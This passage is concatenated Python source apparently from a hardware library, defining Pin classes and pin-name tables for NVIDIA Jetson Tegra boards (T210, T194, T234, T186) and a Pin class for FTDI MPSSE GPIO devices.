            GPIO.output(self.id, val)
            return None
        raise RuntimeError("Invalid value for pin")
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
    """Release all GPIO resources at interpreter exit.

    Registered with :mod:`atexit` so pin state is cleaned up automatically
    when the program terminates.
    """
    print("Exiting... \nCleaning up pins")
    GPIO.cleanup()
# pylint: enable=no-method-argument
# Board pin name -> Tegra SoC signal name table for the T210 (TX1 / Nano).
# Cannot be used as GPIO
SDA = Pin("GEN1_I2C_SDA")
SCL = Pin("GEN1_I2C_SCL")
SDA_1 = Pin("GEN2_I2C_SDA")
SCL_1 = Pin("GEN2_I2C_SCL")
# These pins are native to TX1
BB03 = Pin("GPIO_X1_AUD")
X02 = Pin("MOTION_INT")
H07 = Pin("AP_WAKE_NFC")
E04 = Pin("DMIC3_CLK")
U03 = Pin("UART1_CTS")
U02 = Pin("UART1_RTS")
B03 = Pin("DAP1_SCLK")
B00 = Pin("DAP1_FS")
B01 = Pin("DAP1_DIN")
B02 = Pin("DAP1_DOUT")
P17 = Pin("GPIO_EXP_P17")
E05 = Pin("DMIC3_DAT")
X00 = Pin("MODEM_WAKE_AP")
P16 = Pin("GPIO_EXP_P16")
X03 = Pin("ALS_PROX_INT")
# These pins are native to NANO
S05 = Pin("CAM_AF_EN")
Z00 = Pin("GPIO_PZ0")
V00 = Pin("LCD_BL_PW")
G03 = Pin("UART2_CTS")
G02 = Pin("UART2_RTS")
J07 = Pin("DAP4_SCLK")
J04 = Pin("DAP4_FS")
J05 = Pin("DAP4_DIN")
J06 = Pin("DAP4_DOUT")
Y02 = Pin("LCD_TE")
DD00 = Pin("SPI2_CS1")
B07 = Pin("SPI2_CS0")
B05 = Pin("SPI2_MISO")
B04 = Pin("SPI2_MOSI")
B06 = Pin("SPI2_SCK")
# These pins are shared across T210
BB00 = Pin("AUD_MCLK")
C04 = Pin("SPI1_CS1")
C03 = Pin("SPI1_CS0")
C01 = Pin("SPI1_MISO")
C00 = Pin("SPI1_MOSI")
C02 = Pin("SPI1_SCK")
E06 = Pin("GPIO_PE6")
# ordered as i2cId, SCL, SDA
i2cPorts = (
    (0, SCL, SDA),
    (1, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((0, C02, C00, C01), (1, B06, B04, B05))
"""Tegra T194 pin names"""
import atexit
from Jetson import GPIO
# Address pins by Tegra SoC signal name rather than board header numbering.
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False)  # shh! -- silence Jetson.GPIO warnings
class Pin:
    """Pins dont exist in CPython so...lets make our own!"""

    # Direction constants
    IN = 0
    OUT = 1
    # Logic levels
    LOW = 0
    HIGH = 1
    # Pull resistor options
    PULL_NONE = 0
    PULL_UP = 1
    PULL_DOWN = 2

    id = None
    _value = LOW
    _mode = IN

    def __init__(self, bcm_number):
        self.id = bcm_number

    def __repr__(self):
        return str(self.id)

    def __eq__(self, other):
        return self.id == other

    def init(self, mode=IN, pull=None):
        """Initialize the Pin"""
        if mode is not None:
            if mode not in (self.IN, self.OUT):
                raise RuntimeError("Invalid mode for pin: %s" % self.id)
            self._mode = mode
            GPIO.setup(self.id, GPIO.IN if mode == self.IN else GPIO.OUT)
        if pull is not None:
            # Pulls only make sense on inputs.
            if self._mode != self.IN:
                raise RuntimeError("Cannot set pull resistor on output")
            if pull == self.PULL_UP:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
            elif pull == self.PULL_DOWN:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
            else:
                raise RuntimeError("Invalid pull for pin: %s" % self.id)

    def value(self, val=None):
        """Set or return the Pin Value"""
        if val is None:
            return GPIO.input(self.id)
        if val in (self.LOW, self.HIGH):
            self._value = val
            GPIO.output(self.id, val)
            return None
        raise RuntimeError("Invalid value for pin")
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
    """Release all GPIO resources at interpreter exit.

    Registered with :mod:`atexit` so pin state is cleaned up automatically
    when the program terminates.
    """
    print("Exiting... \nCleaning up pins")
    GPIO.cleanup()
# pylint: enable=no-method-argument
# Board pin name -> Tegra SoC signal name table for the T194 (Xavier / NX).
# Cannot be used as GPIO
SDA = Pin("DP_AUX_CH3_N")
SCL = Pin("DP_AUX_CH3_P")
SDA_1 = Pin("GEN2_I2C_SDA")
SCL_1 = Pin("GEN2_I2C_SCL")
# Jetson Xavier only
Q06 = Pin("SOC_GPIO42")
AA03 = Pin("CAN0_DIN")
AA02 = Pin("CAN0_DOUT")
BB01 = Pin("CAN1_EN")
AA00 = Pin("CAN1_DOUT")
H07 = Pin("DAP2_SCLK")
I02 = Pin("DAP2_FS")
I01 = Pin("DAP2_DIN")
I00 = Pin("DAP2_DOUT")
BB00 = Pin("CAN1_STB")
H00 = Pin("SOC_GPIO12")
Q01 = Pin("SOC_GPIO21")
AA01 = Pin("CAN1_DIN")
# Jetson NX only
S04 = Pin("AUD_MCLK")
T05 = Pin("DAP5_SCLK")
Y00 = Pin("SPI3_SCK")
CC04 = Pin("TOUCH_CLK")
Y04 = Pin("SPI3_CS1_N")
Y03 = Pin("SPI3_CS0_N")
Y01 = Pin("SPI3_MISO")
Q05 = Pin("SOC_GPIO41")
# NOTE(review): duplicate of the Q06 assignment above (same signal) --
# harmless re-binding, kept for both board variants.
Q06 = Pin("SOC_GPIO42")
U00 = Pin("DAP5_FS")
Y02 = Pin("SPI3_MOSI")
T07 = Pin("DAP5_DIN")
T06 = Pin("DAP5_DOUT")
# Clara AGX Xavier only
P04 = Pin("SOC_GPIO04")
# Shared
N01 = Pin("SOC_GPIO54")
R00 = Pin("SOC_GPIO44")
R04 = Pin("UART1_RTS")
R05 = Pin("UART1_CTS")
Z03 = Pin("SPI1_SCK")
Z04 = Pin("SPI1_MISO")
Z05 = Pin("SPI1_MOSI")
Z06 = Pin("SPI1_CS0_N")
Z07 = Pin("SPI1_CS1_N")
# ordered as i2cId, SCL, SDA
i2cPorts = (
    (8, SCL, SDA),
    (1, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((0, Z03, Z05, Z04),)
"""Tegra T234 pin names"""
import atexit
from Jetson import GPIO
# Address pins by Tegra SoC signal name rather than board header numbering.
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False)  # shh! -- silence Jetson.GPIO warnings
class Pin:
    """Pins dont exist in CPython so...lets make our own!"""

    # Direction constants
    IN = 0
    OUT = 1
    # Logic levels
    LOW = 0
    HIGH = 1
    # Pull resistor options
    PULL_NONE = 0
    PULL_UP = 1
    PULL_DOWN = 2

    id = None
    _value = LOW
    _mode = IN

    def __init__(self, bcm_number):
        self.id = bcm_number

    def __repr__(self):
        return str(self.id)

    def __eq__(self, other):
        return self.id == other

    def init(self, mode=IN, pull=None):
        """Initialize the Pin"""
        if mode is not None:
            if mode not in (self.IN, self.OUT):
                raise RuntimeError("Invalid mode for pin: %s" % self.id)
            self._mode = mode
            GPIO.setup(self.id, GPIO.IN if mode == self.IN else GPIO.OUT)
        if pull is not None:
            # Pulls only make sense on inputs.
            if self._mode != self.IN:
                raise RuntimeError("Cannot set pull resistor on output")
            if pull == self.PULL_UP:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
            elif pull == self.PULL_DOWN:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
            else:
                raise RuntimeError("Invalid pull for pin: %s" % self.id)

    def value(self, val=None):
        """Set or return the Pin Value"""
        if val is None:
            return GPIO.input(self.id)
        if val in (self.LOW, self.HIGH):
            self._value = val
            GPIO.output(self.id, val)
            return None
        raise RuntimeError("Invalid value for pin")
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
    """Release all GPIO resources at interpreter exit.

    Registered with :mod:`atexit` so pin state is cleaned up automatically
    when the program terminates.
    """
    print("Exiting... \nCleaning up pins")
    GPIO.cleanup()
# pylint: enable=no-method-argument
# Board pin name -> Tegra SoC signal name table for the T234 (AGX Orin).
# Cannot be used as GPIO
SDA = Pin("GP16_I2C8_DAT") # I2C4
SCL = Pin("GP81_I2C9_CLK")
SDA_1 = Pin("GP14_I2C2_DAT") # I2C2
SCL_1 = Pin("GP13_I2C2_CLK")
# Jetson AGX Orin
Q06 = Pin("GP66")
R04 = Pin("GP72_UART1_RTS_N")
H07 = Pin("GP122")
R00 = Pin("GP68")
N01 = Pin("GP88_PWM1")
BB00 = Pin("GP25")
H00 = Pin("GP115")
Z05 = Pin("GP49_SPI1_MOSI")
Z04 = Pin("GP48_SPI1_MISO")
P04 = Pin("GP56")
Z03 = Pin("GP47_SPI1_CLK")
Z06 = Pin("GP50_SPI1_CS0_N")
Z07 = Pin("GP51_SPI1_CS1_N")
AA01 = Pin("GP18_CAN0_DIN")
AA00 = Pin("GP17_CAN0_DOUT")
BB01 = Pin("GP26")
AA02 = Pin("GP19_CAN1_DOUT")
I02 = Pin("GP125")
R05 = Pin("GP73_UART1_CTS_N")
AA03 = Pin("GP20_CAN1_DIN")
I01 = Pin("GP124")
I00 = Pin("GP123")
AC06 = Pin("GP167")
# NOTE(review): "SPI1_SCK" looks inconsistent with the GP-prefixed SPI3
# signal names around it -- confirm against the Orin pinmux table.
Y00 = Pin("SPI1_SCK")
# NOTE(review): duplicate of the N01 assignment above (same signal) --
# harmless re-binding.
N01 = Pin("GP88_PWM1")
Y04 = Pin("GP40_SPI3_CS1_N")
Y03 = Pin("GP39_SPI3_CS0_N")
Y01 = Pin("GP37_SPI3_MISO")
Q05 = Pin("GP65")
G06 = Pin("GP113_PWM7")
Y02 = Pin("GP38_SPI3_MOSI")
# ordered as i2cId, SCL, SDA
i2cPorts = (
    (7, SCL, SDA),
    (1, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((0, Z03, Z05, Z04),)
"""Tegra T186 pin names"""
import atexit
from Jetson import GPIO
# Address pins by Tegra SoC signal name rather than board header numbering.
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False)  # shh! -- silence Jetson.GPIO warnings
class Pin:
    """Pins dont exist in CPython so...lets make our own!"""

    # Direction constants
    IN = 0
    OUT = 1
    # Logic levels
    LOW = 0
    HIGH = 1
    # Pull resistor options
    PULL_NONE = 0
    PULL_UP = 1
    PULL_DOWN = 2

    id = None
    _value = LOW
    _mode = IN

    def __init__(self, bcm_number):
        self.id = bcm_number

    def __repr__(self):
        return str(self.id)

    def __eq__(self, other):
        return self.id == other

    def init(self, mode=IN, pull=None):
        """Initialize the Pin"""
        if mode is not None:
            if mode not in (self.IN, self.OUT):
                raise RuntimeError("Invalid mode for pin: %s" % self.id)
            self._mode = mode
            GPIO.setup(self.id, GPIO.IN if mode == self.IN else GPIO.OUT)
        if pull is not None:
            # Pulls only make sense on inputs.
            if self._mode != self.IN:
                raise RuntimeError("Cannot set pull resistor on output")
            if pull == self.PULL_UP:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
            elif pull == self.PULL_DOWN:
                GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
            else:
                raise RuntimeError("Invalid pull for pin: %s" % self.id)

    def value(self, val=None):
        """Set or return the Pin Value"""
        if val is None:
            return GPIO.input(self.id)
        if val in (self.LOW, self.HIGH):
            self._value = val
            GPIO.output(self.id, val)
            return None
        raise RuntimeError("Invalid value for pin")
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
    """Release all GPIO resources at interpreter exit.

    Registered with :mod:`atexit` so pin state is cleaned up automatically
    when the program terminates.
    """
    print("Exiting... \nCleaning up pins")
    GPIO.cleanup()
# pylint: enable=no-method-argument
# Board pin name -> Tegra SoC signal name table for the T186 (TX2 / TX2 NX).
# Cannot be used as GPIO
SDA = Pin("GPIO_SEN9")
SCL = Pin("GPIO_SEN8")
SDA_1 = Pin("GEN1_I2C_SDA")
SCL_1 = Pin("GEN1_I2C_SCL")
# Jetson TX2 specific
J06 = Pin("GPIO_AUD1")
AA02 = Pin("CAN_GPIO2")
N06 = Pin("GPIO_CAM7")
N04 = Pin("GPIO_CAM5")
N05 = Pin("GPIO_CAM6")
N03 = Pin("GPIO_CAM4")
AA01 = Pin("CAN_GPIO1")
I05 = Pin("GPIO_PQ5")
T03 = Pin("UART1_CTS")
T02 = Pin("UART1_RTS")
P17 = Pin("GPIO_EXP_P17")
AA00 = Pin("CAN_GPIO0")
Y01 = Pin("GPIO_MDM2")
P16 = Pin("GPIO_EXP_P16")
I04 = Pin("GPIO_PQ4")
J05 = Pin("GPIO_AUD0")
# Jetson TX2 NX specific
W04 = Pin("UART3_RTS")
V01 = Pin("GPIO_SEN1")
C02 = Pin("DAP2_DOUT")
C03 = Pin("DAP2_DIN")
V04 = Pin("GPIO_SEN4")
H02 = Pin("GPIO_WAN7")
H01 = Pin("GPIO_WAN6")
V02 = Pin("GPIO_SEN2")
H00 = Pin("GPIO_WAN5")
H03 = Pin("GPIO_WAN8")
Y03 = Pin("GPIO_MDM4")
N01 = Pin("GPIO_CAM2")
EE02 = Pin("TOUCH_CLK")
U00 = Pin("GPIO_DIS0")
U05 = Pin("GPIO_DIS5")
W05 = Pin("UART3_CTS")
V03 = Pin("GPIO_SEN3")
# Shared pin
J03 = Pin("DAP1_FS")
J02 = Pin("DAP1_DIN")
J01 = Pin("DAP1_DOUT")
J00 = Pin("DAP1_SCLK")
J04 = Pin("AUD_MCLK")
# ordered as i2cId, SCL, SDA
i2cPorts = (
    (1, SCL, SDA),
    (0, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((3, N03, N05, N04),)
"""MPSSE pin names"""
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.url import (
get_ft232h_url,
get_ft2232h_url,
)
class Pin:
    """A basic Pin class for use with FTDI MPSSEs."""

    IN = 0
    OUT = 1
    LOW = 0
    HIGH = 1
    PULL_NONE = 0
    PULL_UP = 1
    PULL_DOWN = 2

    # Shared GPIO controller, lazily created by the first Pin instance.
    mpsse_gpio = None

    def __init__(self, pin_id=None, interface_id=None):
        # setup GPIO controller if not done yet
        # use one provided by I2C as default
        if not Pin.mpsse_gpio:
            # pylint: disable=import-outside-toplevel
            from pyftdi.i2c import I2cController

            # pylint: enable=import-outside-toplevel
            i2c = I2cController()
            if interface_id is None:
                i2c.configure(get_ft232h_url())
            else:
                i2c.configure(get_ft2232h_url(interface_id))
            Pin.mpsse_gpio = i2c.get_gpio()
        # check if pin is valid
        # NOTE: compare against None explicitly -- bit position 0 is a valid
        # pin id and would be skipped by a bare truthiness test.
        if pin_id is not None:
            if Pin.mpsse_gpio.all_pins & 1 << pin_id == 0:
                raise ValueError("Can not use pin {} as GPIO.".format(pin_id))
        # ID is just bit position
        self.id = pin_id

    def init(self, mode=IN, pull=None):
        """Initialize the Pin"""
        # Explicit None check: pin id 0 must not be rejected here.
        if self.id is None:
            raise RuntimeError("Can not init a None type pin.")
        # MPSSE does't have configurable internal pulls?
        if pull:
            raise NotImplementedError("Internal pull up/down not currently supported.")
        pin_mask = Pin.mpsse_gpio.pins | 1 << self.id
        current = Pin.mpsse_gpio.direction
        if mode == self.OUT:
            current |= 1 << self.id
        else:
            current &= ~(1 << self.id)
        Pin.mpsse_gpio.set_direction(pin_mask, current)

    def value(self, val=None):
        """Set or return the Pin Value"""
        # Explicit None check: pin id 0 must not be rejected here.
        if self.id is None:
            raise RuntimeError("Can not access a None type pin.")
        current = Pin.mpsse_gpio.read(with_output=True)
        # read
        if val is None:
            return 1 if current & 1 << self.id != 0 else 0
        # write
        if val in (self.LOW, self.HIGH):
            if val == self.HIGH:
                current |= 1 << self.id
            else:
                current &= ~(1 << self.id)
            # must mask out any input pins
            Pin.mpsse_gpio.write(current & Pin.mpsse_gpio.direction)
            return None
        # release the kraken
        raise RuntimeError("Invalid value for pin")
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.